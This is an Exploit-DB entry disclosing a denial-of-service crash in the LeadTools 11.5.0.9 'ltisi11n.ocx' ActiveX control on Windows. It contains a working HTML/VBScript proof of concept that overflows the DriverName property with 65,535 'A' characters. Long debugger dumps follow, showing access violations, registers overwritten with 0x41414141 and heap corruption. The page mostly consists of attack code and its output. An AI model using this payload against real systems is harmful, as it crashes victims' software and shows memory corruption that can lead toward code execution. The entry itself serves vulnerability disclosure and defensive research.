LeadTools 11.5.0.9 - 'ltisi11n.ocx' DriverName() Access Violation Denial of Service

EDB-ID:

15432

CVE:

N/A

EDB Verified:

Author:

Matthew Bergin

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2010-11-05

Vulnerable App: 
<html>
Test Exploit Page
<object classid='clsid:00110050-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>

targetFile = "C:\Program Files\Rational\common\ltisi11n.ocx"
prototype  = "Property Let DriverName As String"
memberName = "DriverName"
progid     = "LEADISISLib.LEADISIS"
argCount   = 1

arg1=String(65535, "A")

target.DriverName = arg1

</script>


Exception Code: ACCESS_VIOLATION
Disasm: 7C80BEB9	MOV [EDX],AL

Seh Chain:
--------------------------------------------------
1 	7C839AD8 	KERNEL32.dll
2 	73352960 	VBSCRIPT.dll
3 	7C839AD8 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
KERNEL32.7C80BEB9             ltisi11n.AA1537               
ltisi11n.AA1537               OLEAUT32.77135CD9             
OLEAUT32.77135CD9             OLEAUT32.771362E8             
OLEAUT32.771362E8             ltisi11n.AA64D7               
ltisi11n.AA64D7               ltisi11n.AA319B               
ltisi11n.AA319B               VBSCRIPT.73303EB7             
VBSCRIPT.73303EB7             VBSCRIPT.73303E27             
VBSCRIPT.73303E27             VBSCRIPT.73303397             
VBSCRIPT.73303397             VBSCRIPT.73303D88             
VBSCRIPT.73303D88             VBSCRIPT.73311302             
VBSCRIPT.73311302             VBSCRIPT.733063EE             
VBSCRIPT.733063EE             VBSCRIPT.73306373             
VBSCRIPT.73306373             VBSCRIPT.73306BA5             
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D             
VBSCRIPT.73306D9D             VBSCRIPT.73305103             
VBSCRIPT.73305103             SCROBJ.5CE44396               
SCROBJ.5CE44396               SCROBJ.5CE4480B               
SCROBJ.5CE4480B               SCROBJ.5CE446A6               
SCROBJ.5CE446A6               SCROBJ.5CE44643               
SCROBJ.5CE44643               SCROBJ.5CE44608               
SCROBJ.5CE44608               1013C93                       
1013C93                       1006B0C                       
1006B0C                       100332C                       
100332C                       1003105                       
1003105                       1003076                       
1003076                       1002F16                       
1002F16                       KERNEL32.7C817077             


Registers:
--------------------------------------------------
EIP 7C80BEB9 -> AD0013ED
EAX 0013BD41 -> AD0013ED
EBX 00AAA760 -> 00AA408F
ECX 0013CDA4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 02A73000
EDI 0000302A
ESI 02A71F58 -> 00AAA760
EBP 0013BD6C -> 0013EDB0
ESP 0013BD48 -> 0000302A -> Uni: *0*0


Block Disassembly: 
--------------------------------------------------
7C80BEA3	PUSH 7C80BED0
7C80BEA8	CALL 7C8024D6
7C80BEAD	AND DWORD PTR [EBP-4],0
7C80BEB1	MOV ECX,[EBP+C]
7C80BEB4	MOV EDX,[EBP+8]
7C80BEB7	MOV AL,[ECX]
7C80BEB9	MOV [EDX],AL	  <--- CRASH
7C80BEBB	INC ECX
7C80BEBC	INC EDX
7C80BEBD	TEST AL,AL
7C80BEBF	JNZ SHORT 7C80BEB7
7C80BEC1	OR DWORD PTR [EBP-4],FFFFFFFF
7C80BEC5	MOV EAX,[EBP+8]
7C80BEC8	CALL 7C802511
7C80BECD	RETN 8


ArgDump:
--------------------------------------------------
EBP+8	02A71FD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12	0013BD7C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16	41414141
EBP+20	41414141
EBP+24	41414141
EBP+28	41414141


Stack Dump:
--------------------------------------------------
13BD48 2A 30 00 00 58 1F A7 02 60 A7 AA 00 48 BD 13 00  [....X...`...H...]
13BD58 7C BD 13 00 AC F1 13 00 D8 9A 83 7C D0 BE 80 7C  [................]
13BD68 00 00 00 00 B0 ED 13 00 37 15 AA 00 D8 1F A7 02  [................]
13BD78 7C BD 13 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13BD88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]



Exception Code: ACCESS_VIOLATION
Disasm: 7C919084	MOV ECX,[EBX]

Seh Chain:
--------------------------------------------------
1 	7C90E920 	ntdll.dll
2 	7C90E920 	ntdll.dll
3 	7C90E920 	ntdll.dll
4 	7C90E920 	ntdll.dll
5 	73352960 	VBSCRIPT.dll
6 	7C839AD8 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
ntdll.7C919084                ntdll.7C96EEA0                
ntdll.7C96EEA0                ntdll.7C94B394                
ntdll.7C94B394                ntdll.7C918F21                
ntdll.7C918F21                ltisi11n.AA69BC               
ltisi11n.AA69BC               ltisi11n.AA7189               
ltisi11n.AA7189               ltisi11n.AA154C               
ltisi11n.AA154C               OLEAUT32.77135CD9             
OLEAUT32.77135CD9             OLEAUT32.771362E8             
OLEAUT32.771362E8             ltisi11n.AA64D7               
ltisi11n.AA64D7               ltisi11n.AA319B               
ltisi11n.AA319B               VBSCRIPT.73303EB7             
VBSCRIPT.73303EB7             VBSCRIPT.73303E27             
VBSCRIPT.73303E27             VBSCRIPT.73303397             
VBSCRIPT.73303397             VBSCRIPT.73303D88             
VBSCRIPT.73303D88             VBSCRIPT.73311302             
VBSCRIPT.73311302             VBSCRIPT.733063EE             
VBSCRIPT.733063EE             VBSCRIPT.73306373             
VBSCRIPT.73306373             VBSCRIPT.73306BA5             
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D             
VBSCRIPT.73306D9D             VBSCRIPT.73305103             
VBSCRIPT.73305103             SCROBJ.5CE44396               
SCROBJ.5CE44396               SCROBJ.5CE4480B               
SCROBJ.5CE4480B               SCROBJ.5CE446A6               
SCROBJ.5CE446A6               SCROBJ.5CE44643               
SCROBJ.5CE44643               SCROBJ.5CE44608               
SCROBJ.5CE44608               1013C93                       
1013C93                       1006B0C                       
1006B0C                       100332C                       
100332C                       1003105                       
1003105                       1003076                       
1003076                       1002F16                       
1002F16                       KERNEL32.7C817077             


Registers:
--------------------------------------------------
EIP 7C919084 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 02A72100 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 02A70168 -> 00000000
EDI 41414141
ESI 02A720F8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013B824 -> 0013B8A8
ESP 0013B608 -> 0000001C


Block Disassembly: 
--------------------------------------------------
7C91906D	MOV [EBP-25],AL
7C919070	LEA EAX,[ESI+8]
7C919073	MOV EDI,[EAX]
7C919075	MOV [EBP-1E4],EDI
7C91907B	MOV EBX,[ESI+C]
7C91907E	MOV [EBP-164],EBX
7C919084	MOV ECX,[EBX]	  <--- CRASH
7C919086	CMP ECX,[EDI+4]
7C919089	JNZ 7C92CC59
7C91908F	CMP ECX,EAX
7C919091	JNZ 7C92CC59
7C919097	PUSH ESI
7C919098	PUSH DWORD PTR [EBP-1C]
7C91909B	CALL 7C910684
7C9190A0	MOV [EBX],EDI


ArgDump:
--------------------------------------------------
EBP+8	02A70000 -> 000000C8
EBP+12	50000161
EBP+16	0000001C
EBP+20	02A70000 -> 000000C8
EBP+24	00000000
EBP+28	02A70000 -> 000000C8


Stack Dump:
--------------------------------------------------
13B608 1C 00 00 00 00 00 A7 02 01 00 00 00 00 00 00 00  [................]
13B618 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13B628 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13B638 00 00 00 00 00 00 00 00 41 41 41 41 00 00 00 00  [................]
13B648 00 00 00 00 00 00 00 00 00 60 13 00 00 00 14 00  [.........`......]



Exception Code: BREAKPOINT
Disasm: 7C90120E	INT3

Seh Chain:
--------------------------------------------------
1 	7C90E920 	ntdll.dll
2 	7C90E920 	ntdll.dll
3 	7C90E920 	ntdll.dll
4 	7C839AD8 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
ntdll.7C90120F                ntdll.7C95F38C                
ntdll.7C95F38C                ntdll.7C96E507                
ntdll.7C96E507                ntdll.7C96F75E                
ntdll.7C96F75E                ntdll.7C94BC4C                
ntdll.7C94BC4C                ntdll.7C927573                
ntdll.7C927573                ltisi11n.AA69F4               
ltisi11n.AA69F4               VBSCRIPT.733015F2             
VBSCRIPT.733015F2             VBSCRIPT.7331EEE1             
VBSCRIPT.7331EEE1             VBSCRIPT.7331F192             
VBSCRIPT.7331F192             VBSCRIPT.7331F632             
VBSCRIPT.7331F632             VBSCRIPT.73321CB3             
VBSCRIPT.73321CB3             SCROBJ.5CE448DD               
SCROBJ.5CE448DD               SCROBJ.5CE49EEA               
SCROBJ.5CE49EEA               SCROBJ.5CE49E41               
SCROBJ.5CE49E41               1013CE7                       
1013CE7                       1006B0C                       
1006B0C                       100332C                       
100332C                       1003105                       
1003105                       1003076                       
1003076                       1002F16                       
1002F16                       KERNEL32.7C817077             


Registers:
--------------------------------------------------
EIP 7C90120F -> 000B0041
EAX 02A71EF0 -> 000B0041
EBX 02A720E4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 7C91EAD5 -> FF0014C2
EDX 0013EECE -> EEF4000A
EDI 000001EC
ESI 02A71EF0 -> 000B0041
EBP 0013F0D4 -> 0013F0EC
ESP 0013F0D0 -> 7C96E139


Block Disassembly: 
--------------------------------------------------
7C9011FF	TEST BYTE PTR [ESI+10],10
7C901203	JE 7C90FEF6
7C901209	POP ESI
7C90120A	LEAVE
7C90120B	RETN 4
7C90120E	INT3
7C90120F	RETN	  <--- CRASH
7C901210	MOV EDI,EDI
7C901212	INT3
7C901213	RETN
7C901214	MOV EDI,EDI
7C901216	MOV EAX,[ESP+4]
7C90121A	INT3
7C90121B	RETN 4
7C90121E	MOV EAX,FS:[18]


ArgDump:
--------------------------------------------------
EBP+8	02A71EF0 -> 000B0041
EBP+12	02A71EF0 -> 000B0041
EBP+16	02A70000 -> 000000C8
EBP+20	02A71EF0 -> 000B0041
EBP+24	0013F100 -> 0013F174
EBP+28	7C96E507 -> 3374C084


Stack Dump:
--------------------------------------------------
13F0D0 39 E1 96 7C EC F0 13 00 8C F3 95 7C F0 1E A7 02  [................]
13F0E0 F0 1E A7 02 00 00 A7 02 F0 1E A7 02 00 F1 13 00  [................]
13F0F0 07 E5 96 7C 00 00 00 00 00 00 A7 02 F8 1E A7 02  [................]
13F100 74 F1 13 00 5E F7 96 7C 00 00 A7 02 F0 1E A7 02  [t...^...........]
13F110 14 F9 96 7C 00 00 A7 02 F8 1E A7 02 60 00 00 40  [............`...]



Exception Code: ACCESS_VIOLATION
Disasm: 7C96E478	CMP BYTE PTR [EBX+7],FF

Seh Chain:
--------------------------------------------------
1 	7C90E920 	ntdll.dll
2 	7C90E920 	ntdll.dll
3 	7C839AD8 	KERNEL32.dll
4 	7C90E920 	ntdll.dll
5 	7C839AD8 	KERNEL32.dll
6 	7C839AD8 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
ntdll.7C96E478                ntdll.7C96FA1D                
ntdll.7C96FA1D                ntdll.7C94D281                
ntdll.7C94D281                KERNEL32.7C834D23             
KERNEL32.7C834D23             LTKRN11n.2001087F             
LTKRN11n.2001087F             ntdll.7C913A43                
ntdll.7C913A43                KERNEL32.7C80C136             
KERNEL32.7C80C136             KERNEL32.7C80B72F             


Registers:
--------------------------------------------------
EIP 7C96E478
EAX FFFFFFF8
EBX FFFFFFF8
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97E5A0
EDI 00000000
ESI 00150000 -> 000000C8
EBP 00FFFD9C -> 00FFFDEC
ESP 00FFFD94 -> 00150000


Block Disassembly: 
--------------------------------------------------
7C96E468	PUSH EBX
7C96E469	MOV EBX,[EBP+C]
7C96E46C	TEST EBX,EBX
7C96E46E	PUSH ESI
7C96E46F	MOV ESI,[EBP+8]
7C96E472	JE 7C96E53E
7C96E478	CMP BYTE PTR [EBX+7],FF	  <--- CRASH
7C96E47C	JNZ SHORT 7C96E4BC
7C96E47E	CMP BYTE PTR [ESI+586],2
7C96E485	JNZ SHORT 7C96E48F
7C96E487	MOV EAX,[ESI+580]
7C96E48D	JMP SHORT 7C96E491
7C96E48F	XOR EAX,EAX
7C96E491	TEST EAX,EAX
7C96E493	JE 7C96E53E


ArgDump:
--------------------------------------------------
EBP+8	00150000 -> 000000C8
EBP+12	FFFFFFF8
EBP+16	7C96FADC -> Asc: RtlGetUserInfoHeap
EBP+20	00000000
EBP+24	00000000
EBP+28	00000003


Stack Dump:
--------------------------------------------------
FFFD94 00 00 15 00 01 00 00 00 EC FD FF 00 1D FA 96 7C  [................]
FFFDA4 00 00 15 00 F8 FF FF FF DC FA 96 7C 00 00 00 00  [................]
FFFDB4 00 00 00 00 03 00 00 00 6C FE FF 00 8F 04 44 7E  [........l.....D.]
FFFDC4 F8 FF FF FF 00 00 15 00 5B 21 00 01 02 04 00 00  [........[.......]
FFFDD4 B0 FD FF 00 00 00 00 00 40 FE FF 00 20 E9 90 7C  [................]



ApiLog
--------------------------------------------------

***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
Debug String Log
--------------------------------------------------

HEAP[wscript.exe]: 
Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services